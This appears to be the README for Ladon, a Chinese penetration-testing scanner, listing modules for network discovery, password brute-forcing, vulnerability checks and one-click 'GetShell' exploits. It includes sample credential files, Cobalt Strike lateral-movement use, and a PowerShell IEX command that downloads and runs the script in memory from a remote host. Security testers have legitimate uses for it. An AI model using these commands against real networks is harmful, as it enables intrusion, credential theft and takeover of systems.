ID | 主题 | URL |
---|---|---|
1 | Ladon文档主页 | https://github.com/k8gege/Ladon/wiki |
2 | 基础用法详解 | https://github.com/k8gege/Ladon/wiki/Ladon-Usage |
3 | Cobalt Strike | https://github.com/k8gege/Ladon/wiki/Ladon-&-Cobalt-Strike |
4 | Exp生成器使用 | https://github.com/k8gege/Ladon/wiki/LadonExp-Usage |
5 | 高度自定义插件 | https://github.com/k8gege/Ladon/wiki/Ladon-Diy-Moudle |
6 | 外部模块参考 | https://github.com/k8gege/K8CScan/wiki |
7 | PowerLadon | 兼容win7-win10 PowerShell,无需指定.net或powershell版本 |
8 | 跨平台使用 | 目前有python版的Cscan但功能少,后续可能通过mono跨平台 |
9 | 漏洞演示视频 | https://github.com/k8gege/K8CScan/tree/master/Video |
git clone https://github.com/k8gege/Ladon.git
使用VS2012或以上版本分别编译.net 3.5、4.0版本EXE
https://github.com/k8gege/Ladon/releases
Win7/2008或安装.net 2.x 3.x系统可以使用3.5的exe
Win8-win10或安装.net 4.x系统可以使用4.0的exe
Ladon是希腊神话中的神兽,看守金苹果的百头巨龙。它从不睡觉,被赫拉克勒斯借扛天巨人之手诱巨龙睡着
杀死巨龙并偷得了金苹果。巨龙死前将自己的魂魄封印在金苹果中,偷盗者将金苹果送给了白雪公主,公主
为了报恩将金苹果分给了七个小矮人,吃下以后他们变成了龙珠散落到世界各地,龙珠分为七颗,它蕴含着
可以令奇迹发生的力量。当集齐7颗龙珠念出咒语,就能召唤神龙,而神龙则会实现召唤者提出的一个愿望。
无论内网还是外网渗透信息收集都是非常关键,信息收集越多越准确渗透的成功率就越高。
但成功率还受到漏洞影响,漏洞受时效性影响,对于大型内网扫描速度直接影响着成功率。
漏洞时效性1-2天,扫描内网或外网需1周时间,是否会因此错过很多或许可成功的漏洞?
对于那些拥有几百上千域名的大站来说,你发现越快成功率就越高,慢管理员就打补丁了。
因此我们需要一个支持批量C段/B段甚至A段的扫描器,添加自定义模块快速检测新出漏洞。
Ladon一款用于大型网络渗透的多线程插件化综合扫描神器,含端口扫描、服务识别、网络资产、密码爆破、高危漏洞检测以及一键GetShell,支持批量A段/B段/C段以及跨网段扫描,支持URL、主机、域名列表扫描。5.5版本内置39个功能模块,通过多种协议以及方法快速获取目标网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间件、开放服务、路由器、数据库等信息,漏洞检测包含MS17010、Weblogic、ActiveMQ、Tomcat、Struts2等,密码爆破11种含数据库(Mysql、Oracle、MSSQL)、FTP、SSH(Linux主机)、VNC、Windows密码(IPC、WMI、SMB)、Weblogic后台、Rar压缩包密码等,Web指纹识别模块可识别75种(Web应用、中间件、脚本类型、页面类型)等,可高度自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配置INI批量调用任意外部程序或命令,EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支持Cobalt Strike插件化扫描快速拓展内网进行横向移动。
虽然Ladon功能丰富多样,但使用却非常简单,任何人都能轻易上手
只需一或两个参数就可用90%的功能,一个模块相当于一个新工具
Ladon.exe可在安装有.net 2.0及以上版本Win系统中使用(Win7后系统自带.net)
如Cmd、PowerShell、远控Cmd、WebShell等,以及Cobalt Strike内存加载使用
实战并不那么顺利,有些内网转发后很卡或无法转发,只能将工具上传至目标
有些马可能上传两三M的程序都要半天甚至根本传不了,PY的几十M就更别想了
Ladon采用C#研发,程序体积很小500K左右,即便马不行也能上传500K程序吧
还不行也可PowerShell远程内存加载,这点是PY或GO编译的大程序无法比拟的
为用户提供一个简单易用、功能丰富、高度灵活、可定制的扫描工具,减少大量重复操作提高工作效率
1 支持指定IP扫描
2 支持指定域名扫描
3 支持指定机器名扫描
4 支持指定C段扫描(ip/24)
5 支持指定B段扫描(ip/16)
6 支持指定A段扫描(ip/8)
7 支持指定URL扫描
8 支持批量IP扫描(ip.txt)
9 支持批量C段扫描(ip24.txt)
10 支持批量B段扫描(ip16.txt)
11 支持批量URL扫描(url.txt)
12 支持批量域名扫描(domain.txt)
13 支持批量机器名扫描(host.txt)
14 支持批量字符串列表(str.txt)
15 支持主机帐密列表(check.txt)
16 支持用户密码列表(userpass.txt)
17 支持指定范围C段扫描
18 支持参数加载自定义DLL(仅限C#)
19 支持参数加载自定义EXE(仅限C#)
20 支持参数加载自定义INI配置文件
21 支持参数加载自定义PowerShell
22 支持自定义程序(系统命令或第三方程序即任意语言开发的程序或脚本)
23 支持自定义模块(支持多种语言编写的DLL/.NET程序集/PowerShell脚本)
24 支持Cobalt Strike(beacon命令行下扫描目标内网或跳板扫描外网目标)
例子: Ladon OnlinePC(扫当前机器所处C段,其它模块同理)
例子: Ladon 192.168.1.8/24 OnlinePC
ID | 模块名称 | 功能说明 |
---|---|---|
1 | OnlinePC | 存活主机扫描 |
2 | OnlineIP | 仅存活主机IP |
3 | UrlScan | URL域名扫描 |
4 | SameWeb | 同服域名扫描 |
5 | WebScan | Web信息扫描 |
6 | WebDir | 后台目录扫描 |
7 | SubDomain | 子域名爆破 |
8 | DomainIP | 域名解析IP |
9 | HostIP | 主机名转IP |
例子: Ladon OsScan
例子: Ladon 192.168.1.8/24 OsScan
ID | 模块名称 | 功能说明 |
---|---|---|
1 | OsScan | 操作系统版本探测 |
2 | PortScan | 端口扫描含Banner |
3 | WebBanner | 内网Web信息扫描 |
4 | WhatCMS | 75种Web指纹识别 |
5 | CiscoScan | 思科设备扫描 |
6 | EnumMssql | 枚举Mssql数据库主机 |
7 | EnumShare | 枚举网络共享资源 |
[自定义端口(IP:端口)、帐密检测(用户 密码)、主机帐密检测(IP 端口 数据库 用户 密码)]
例子: Ladon SshScan
例子: Ladon 192.168.1.8/24 SshScan
例子: Ladon 192.168.1.8:22 SshScan (指定端口)
例子: Ladon test.rar RarScan
ID | 模块名称 | 功能说明 |
---|---|---|
1 | WmiScan | Wmi密码爆破(Windowns) |
2 | IpcScan | Ipc密码爆破(Windows) |
3 | SmbScan | SMB密码爆破(Windows) |
4 | SshScan | SSH密码爆破(Linux) |
5 | MssqlScan | Mssql数据库密码爆破 |
6 | OracleScan | Oracle数据库密码爆破 |
7 | MysqlScan | Mysql数据库密码爆破 |
8 | WeblogicScan | Weblogic后台密码爆破 |
9 | VncScan | VNC远程桌面密码爆破 |
10 | FtpScan | Ftp服务器密码爆破 |
11 | RarScan | Rar压缩包密码爆破 |
例子: Ladon MS17010
例子: Ladon 192.168.1.8/24 MS17010
例子: Ladon http://192.168.1.8 WeblogicExp
ID | 模块名称 | 功能说明 |
---|---|---|
1 | MS17010 | SMB漏洞检测(CVE-2017-0143/CVE-2017-0144/CVE-2017-0145/CVE-2017-0146/CVE-2017-0148) |
2 | WeblogicPoc | Weblogic漏洞检测(CVE-2019-2725) |
3 | PhpStudyPoc | PhpStudy后门检测(phpstudy 2016/phpstudy 2018) |
4 | ActivemqPoc | ActiveMQ漏洞检测(CVE-2016-3088) |
5 | TomcatPoc | Tomcat漏洞检测(CVE-2017-12615) |
6 | WeblogicExp | Weblogic漏洞利用(CVE-2019-2725) |
7 | TomcatExp | Tomcat漏洞利用(CVE-2017-12615) |
8 | Struts2Poc | Struts2漏洞检测(S2-005/S2-009/S2-013/S2-016/S2-019/S2-032/DevMode) |
例子: Ladon 字符串 EnHex
例子: Ladon EnHex (批量str.txt)
ID | 模块名称 | 功能说明 |
---|---|---|
1 | EnHex | 批量Hex密码加密 |
2 | DeHex | 批量Hex密码解密 |
3 | EnBase64 | 批量Base64密码加密 |
4 | DeBase64 | 批量Base64密码解密 |
注:以上仅是该工具内置模块的初级用法,外置插件或更高级用法请查看使用文档
中级用法INI文件配置调用任意程序、系统命令、各种语言现成EXP的批量利用
高级用法Exp生成器一键生成Poc,使用各种语言编写插件扩展Ladon扫描能力。
ID | 模块类型 | 功能说明 |
---|---|---|
1 | 漏洞扫描 | CVE 2019-0708 Windows Rdp 3389漏洞批量检测 |
2 | 漏洞利用 | ThinkPHP 5.0.22 5.1.29 RCE GetShell Exploit |
3 | 漏洞利用 | CVE-2019-9621 Zimbra GetShell Exploit |
4 | 漏洞利用 | CVE-2019-0604 SharePoint GetShell Exploit |
5 | 漏洞利用 | CVE 2016-3088 ActiveMQ GetShell Exploit |
6 | 漏洞利用 | Apache Solr 8.2.0 Velocity RCE 0day Exploit |
7 | 漏洞利用 | PhpStudy后门 GetShell Exploit |
8 | 命令执行 | INI调用外部程序命令批量Linux上控 |
9 | 命令执行 | INI调用外部程序命令批量Windowns上控 |
文档参考Cscan: https://github.com/k8gege/K8CScan/wiki
默认扫描会先通过icmp扫描主机是否存活,当使用工具转发内网
或者目标机器禁ping时,使用noping参数进行扫描,速度稍慢一点
Ladon noping
Ladon noping 192.168.1.8/24
Ladon noping 192.168.1.8/24 MS17010
1 调用系统ping命令进行存活主机探测
ping.ini
[Ladon]
exe=cmd.exe
arg=/c ping
命令: Ladon ping.ini
命令: Ladon 192.168.1.8/24 ping.ini
2 调用Python poc批量检测漏洞
[Ladon]
exe=F:\Python279\python.exe
arg=CVE-2019-11043-POC.py
例子: https://github.com/k8gege/CVE-2019-11043
使用PortScan模块时,默认扫描常见高危漏洞端口
遇到修改了默认端口的,Ladon就无法扫描了吗?
使用port.txt
格式1:80,21,1433,3306,445
格式2:80-88,21-23,5800-5900
格式3:
21
23
80
格式4:
80-88
21-23
1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan
192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan
192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan
SSH
check.txt
192.168.1.8 22 root k8gege
192.168.1.8 root k8gege
命令: Ladon SshScan
SMB/IPC/WMI(直接ip/用户/密码)
check.txt
192.168.1.8 root k8gege
命令: Ladon WmiScan
weblogic
check.txt(url 用户 密码)
http://192.168.1.8:7001/console weblogic k8gege
命令: Ladon WeblogicScan
因Rar压缩包只需一个密码,故只需pass.txt,注意中文密码需将txt保存为Ansi编码
命令: Ladon test.rar RarScan
0x001 PowerShell
$ powershell
$ Import-Module .\Ladon.ps1
$ Ladon OnlinePC
0x002 Cmd Local
$ powershell Import-Module .\Ladon.ps1;Ladon OnlinePC
0x003 Cmd Remote
$ powershell "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.5:800/Ladon.ps1'); Ladon OnlinePC"